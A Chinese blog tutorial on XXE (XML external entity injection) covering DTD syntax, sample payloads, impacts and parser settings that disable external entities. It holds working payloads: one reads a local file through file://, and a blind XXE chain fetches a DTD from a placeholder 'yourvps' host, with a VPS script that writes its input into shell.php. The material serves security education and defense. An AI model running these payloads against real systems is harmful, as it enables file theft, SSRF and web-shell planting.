XXE漏洞原理

最新推荐文章于 2023-07-20 17:25:11 发布
最新推荐文章于 2023-07-20 17:25:11 发布
阅读量4k 收藏 13
点赞数 3
分类专栏: 漏洞 文章标签: XXE
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43821663/article/details/88068789
版权

XXE漏洞是XML外部实体注入漏洞,那什么是外部实体呢?

XML DTD

1、文档类型定义(DTD)可定义合法的XML文档构建模块。它使用一系列合法的元素来定义文档的结构。

2、DTD 可被成行地声明于 XML 文档中,也可作为一个外部引用

Ps:第二条是重点,也是XXE漏洞产生的原因,DTD可以定义外部实体并引用

DTD语法

  • 若DTD要在XML文档中使用,他需要包含在·DOCTYPE声明中

  • 语法

    <!DOCTYPE 根元素 [元素声明]>

  • 实体引用

    <!ENTITY 实体名 “”实体值“”>

  • 示例代码

    <?xml version="1.0" encoding="utf-8"?> //xml声明
<!DOCTYPE playwin [
<!ENTITY name "playwin">
]>
<resume>
<name> &name; </name>
</resume>

    在这里插入图片描述

    • 一个实体由三部分构成: 一个和号 (&), 一个实体名称, 以及一个分号 ( ; )。
    • 声明 name 的值为 playwin ,下面引用 &name;xml会自动解析为他的值,如果有的话,否则报错

  • 外部实体

    • 简单的说,就不是xml本身已定义的实体,需要引用在xml文件之外的数据。
    • 语法
      <!ENTITY 实体名字 SYSTEM "URI/URL">
      • SYSTEM 启了一个声明作用,让解析器知道,这是一个外部实体
      • 如果不在其他环境中,只打开xml文件本身,浏览器默认是不会引用外部实体
        在这里插入图片描述
    • 根据不同环境不同协议读取外部数据
      在这里插入图片描述

什么是XXE

  • XXE 也就是 XML外部实体注入攻击

利用方式

  • php环境下

    <?php
$xml=simplexml_load_string($_GET['xml']);
print_r($xml);
?>

  • 将以下xml代码进行URL编码,读取文件

    <?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE playwin [
<!ENTITY name SYSTEM "file:///D:/phpStudy/PHPTutorial/WWW/1.txt">
]>
<resume>
<name> &name; </name>
</resume>

    在这里插入图片描述

  • 回显
    在这里插入图片描述

    • 成功XXE

    XXE能做什么

    • blind XXE

      • 若上面php中没有print_r,我们还是可以发起http请求,进行攻击

      • <?php
$xml=simplexml_load_string($_GET['xml']);
?>

      • 利用参数实体

        <!ENTITY % 实体名字  SYSTEM(外部实体加上) ‘实体值’>

      • 在vps创建一个php文件

        <?php
file_put_contents("shell.php", $_GET['file']) ;
?>

      • 通过过参数实体,请求vps上的dtd文件

        • dtd文件
        <!ENTITY % haha "<!ENTITY ok SYSTEM 'http://yourvps/2.php?file=123'>">
        • xml文件
        <?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE playwin [
<!ENTITY  % name SYSTEM "http://yourvps/1.dtd">  //请求dtd文件
%name;
%haha;
]>
<resume>
<name> &ok; </name>
</resume>

      • 结果
        在这里插入图片描述

        • 理论上我们可以写入shell

    • 读取文件

      • 利用各种协力读取想要的文件
      • 读取php文件需要利用php://协议进行base64加密输出,因为php< ,>会影响到xml

    • 命令执行

      • php环境下,xml命令执行要求php装有expect扩展,而且php上解析也需要它

    • 内网探测/SSRF

      • XML 外部实体中是可以使用http://协议,可以利用该请求去探查内网,进行SSRF攻击

    • 进行 DOS 攻击

    • 文件上传

      • 在java中利用jar://协议可实现

    • 钓鱼

    防御XXE

    • 禁用开发语言引用外部实体的能力

      • PHP:

        libxml_disable_entity_loader(true);

      • JAVA:

        DocumentBuilderFactory dbf =DocumentBuilderFactory.newInstance();

        dbf.setExpandEntityReferences(false);

      • Python:

        from lxml import etree

        xmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))

    • 白名单过滤

    判断是否存在XXE漏洞

    • xml是否会被解析
      <?xml version='1.0' encoding='utf-8'?>
<!DOCTYPE ROOT [
<!ENTITY playwin "success">
]>
<root>&playwin;</root>
      • 若出现success,则说明解析成功,进行下一步
    • 检测服务器是否支持引用外部实体
      <?xml version='1.0' encoding='utf-8'?>
<!DOCTYPE ROOT [
<!ENTITY playwin SYSTEM "http://yourvps/xx.txt">
]>
<root>&playwin;</root>
      • 解析成功,说明有XXE漏洞
71aoo
关注
  • 3
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
XXE漏洞原理及防御
z.mumu的博客
07-13 1904
1.XXE漏洞 XXE漏洞就是XML外部实体注入,就是当xml引用外部实体并解析的时候会产生的漏洞,xml解析器去获取其中的外部资源并存储到内部实体中,攻击者可引用外部实体对目标进行文件读取、命令执行、DDOS、内网探测等。 2.什么是xml 1.XML 指可扩展标记语言(EXtensible Markup Language)是被设计用来传输和存储数据,而HTML则是被设计用来显示数据。...
XXE漏洞详解【内含vulnhub靶场XXE Lab:1详解】
07-30
内含xxe漏洞原理,以及该漏洞的多种利用方式,同时根据八个具体案例详细描述漏洞的利用方式。 【想要搭建vulnhub内靶场可关注博主,然后私聊我哦】 同时内含vulnhub中xxe lab:1靶场的过关记录 渗透思路: 由于网站信息什么都没有给出,首先判断靶场搭建的ip【实在判断不出来可以nmap扫一下,找到开放80端口的ip】 得到ip后,可以使用burpsuite进行目录爬取,得到sitemap后就可以对相应可疑站点进行测试,由于该靶场为xxe漏洞靶场,找到对应的登录页面抓包进行构造payload进行测试,其中具体构造payload并找到对应flag见pdf所示。 资源使用人群:前后端有一定了解,具备一些安全方面知识,但不多,保姆级教程,只要你想学就能学会。 工具:忍者渗透测试系统【burpsuite,nmap,base32解密,php在线运行环境,base64解密,cmd5在线平台】
网络安全-XXE(XML外部实体注入)原理、攻击及防御
关注网络安全、云原生安全
09-07 4051
目录 前言 简介 原理 攻击 防御 禁用外部实体 过滤用户提交的XML数据 前言 XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。 博主之前用xml也没有使用过DTD,因为是可选的嘛,这里就简单说一下,学过的跳过。 DTD(文档类型定义)的作用是定义 XML 文档的合法构建模块。DTD 可以在 XML 文档内声明,也可以外部引用。 内部声明DTD <!DOCTYPE 根元素 [元素声明]>引用外部DTD文档 <!DOCTYPE 根元素 SYSTE
XXE漏洞详解(全网最详细)
qq_61553520的博客
05-09 2475
XXE:全称为XML Enternal Entity Injection,中文名称:XML外部实体注入。
Web漏洞-XXE漏洞(详细)
Ays.Ie的博客
03-11 4393
该篇描述Web漏洞-XXE漏洞(详细)
XXE原理,利用与修复详解
GalaxySpaceX的博客
07-20 963
XXE原理+利用+修复
XXE漏洞原理--简单理解
一醉一休的博客
03-16 3517
XXE漏洞全称XML External Entity Injection,即xmI外部实体注入漏洞XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害,XML(也是一种语言)被设计用来传输和存储数据 DTD(Document Type Definition 文档类型定义) 1.DTD实体是用于定义引用普通文本或特殊字符的快捷方式的变量,可以内部声明或外部引用 2.外部实体(即
(39.2)【XXE漏洞专题】XXE原理、产生、检测、危害、利用、示例
04-26 3402
【专题】XXE入门
XXE原理简介、防御方案
qq_37432174的博客
11-24 6372
某些应用程序允许XML 格式的数据输入和解析,可以通过引入外部实体的方式进行攻击。,由于程序在解析输入的XML数据时,解析了攻击者伪造的外部实体而产生的。
5、XXE漏洞pdf资料
最新发布
10-15
5、XXE漏洞
XXE 原理漏洞详解.md
04-03
XXE原理漏洞,易懂。
刚开始学XXE漏洞,可以看看这个博客.md
05-05
刚开始学XXE漏洞的时候,很懵,看见了这个博客,就转载一下,希望对刚接触这个东西的同学有帮助,刚学的时候浪费了很多时间,希望别人可以少浪费这个找资源的时间
xxe原理及利用
hackzkaq的博客
03-09 702
零基础学黑客,搜索公众号:白帽子左一 什么是xxe XML External Entity Injection 外部实体注入,该漏洞发生在应用程序解析XML输入时, 没有禁止外部实体的加载,导致可加载任意外部文件,造成文件读取、命令执行(有点极端)、内网端口扫描、攻击内网网站、发起dos攻击等危害。 什么是xml 一种标记语言,被设计用来传输和存储数据(html是用来显示数据): <?xml version="1.0" encoding="UTF-8"?> <person> &l
XXE漏洞以及Blind XXE总结
热门推荐
Exploit的小站~
05-10 5万+
 转载请注明出处:http://blog.csdn.net/u011721501 0、前言 XXE漏洞是针对使用XML交互的Web应用程序的攻击方法,在XEE漏洞的基础上,发展出了BlindXXE漏洞。目前来看,XML文件作为配置文件(Spring、Struts2等)、文档结构说明文件(PDF、RSS等)、图片格式文件(SVGheader)应用比较广泛,此外,网上有一些在线XML格式...
xxe漏洞原理及防御
AoaNgzh的博客
05-06 641
在解析 XML 文档时,如果遇到了一个引用了外部实体的节点,则解析器会去解析这个外部实体,并将其内容替换为实体引用的内容。当解析器解析到这个节点时,就会去解析实体,并将实体的内容替换为节点的内容,最终导致应用程序读取了 /etc/passwd 文件的内容。需要注意的是,以上措施只是一些常见的防范措施,您需要根据具体情况设计和实现适当的防范措施,以保护您的应用程序免受 XXE 漏洞的威胁。采用安全的 XML 解析器:选择采用安全可靠的 XML 解析器,避免使用老旧的解析器或未经安全验证的解析器。
XXE漏洞原理分析
YvesHe的专栏
10-16 2382
一.什么是XXE漏洞? 在web攻防中有很多的漏洞,这里就来介绍一种基于XML数据格式的漏洞. 那么大家经常说的XXE漏洞到底是个什么漏洞呢? XML 外部实体漏洞 <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///c:/windows/win.ini" >]> <foo>&a
XXE漏洞原理/防御
wangyuxiang946的博客
07-16 1万+
原理 XXE又叫 XML外部实体注入 , 攻击者修改DTD引入的外部文件 , 从而执行攻击 , 比如读取任意文件 , 命令执行 , 内网探测 或者 DOS拒绝服务 防御 XXE的防御有两个方向 过滤 和 禁用 过滤参数中的关键词<!DOCTYPE 和 <!ENTITY,或者SYSTEM和PUBLIC 或者禁用外部实体引用 XML XML用来传输数据 , 常用作配置文件 XML文档结果包括三部分 XML声明 ...
xxe漏洞原理及防御方式
05-25
XXE(XML External Entity)漏洞是一种常见的Web应用程序安全漏洞,攻击者利用这种漏洞可以读取本地文件、发起内部网络攻击等。XXE漏洞原理是通过在XML文档中插入恶意实体来触发解析器加载恶意实体,从而发起攻击。 以下是XXE漏洞的防御方式: 1.禁止使用外部实体:在解析XML文档时,应该禁止使用外部实体,避免攻击者利用外部实体来读取本地文件等。 2.使用白名单:仅允许特定的实体和DTD(Document Type Definition)文件,不允许使用任意的实体和DTD文件。 3.过滤输入数据:在接收用户输入数据时,应该对输入数据进行过滤和检查,避免恶意实体被插入到XML文档中。 4.升级解析器:使用最新版本的XML解析器可以提高安全性,因为新版本通常会修复已知的漏洞。 5.使用WAF(Web应用程序防火墙):WAF可以检测并防止XXE漏洞攻击,建议在Web应用程序中使用WAF。 总之,XXE漏洞是一种常见的Web应用程序安全漏洞,开发人员应该注意防范和修复这种漏洞

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值